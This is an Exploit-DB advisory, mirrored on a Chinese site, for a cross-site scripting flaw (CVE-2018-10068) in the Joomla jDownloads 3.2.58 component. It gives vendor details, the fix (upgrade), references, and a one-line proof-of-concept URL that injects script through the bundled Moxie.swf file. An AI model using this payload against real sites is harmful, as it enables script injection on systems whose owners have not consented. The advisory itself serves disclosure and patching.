Joomla! Component jDownloads 3.2.58 – Cross Site Scripting

• Exploit Database
• 16 阅读

• 作者： Sureshbabu Narvaneni
  日期： 2018-04-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44471/

• #######################################
  # Exploit Title: Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
  # Google Dork: N/A
  # Date: 14-04-2018
  #######################################
  # Exploit Author: Sureshbabu Narvaneni#
  #######################################
  # Author Blog : http://nullnews.in
  # Vendor Homepage: http://www.jdownloads.com/
  # Software Link: http://www.jdownloads.com/index.php/downloads/category/6-jdownloads.html
  # Affected Version: 3.2.58
  # Category: WebApps
  # Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
  # CVE : CVE-2018-10068
  #
  # 1. Vendor Description:
  #
  # Exclusive Download manager for Joomla!
  #
  # 2. Technical Description:
  #
  # Cross-site scripting (XSS) vulnerability in plupoad flash component in jDownloads before 3.2.59 allows remote attackers to inject arbitrary web script.
  #
  # 3. Proof Of Concept:
  #
  http://url/joomla/administrator/components/com_jdownloads/assets/plupload/js/Moxie.swf?target%g=alert&uid%g=nice
  #
  # 4. Solution:
  #
  # Upgrade to latest release.
  # https://extensions.joomla.org/extension/jdownloads/
  #
  # 5. Reference:
  # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10068
  # https://vel.joomla.org/resolved/2150-jdownloads-3-2-58-xss-cross-site-scripting
  #####################################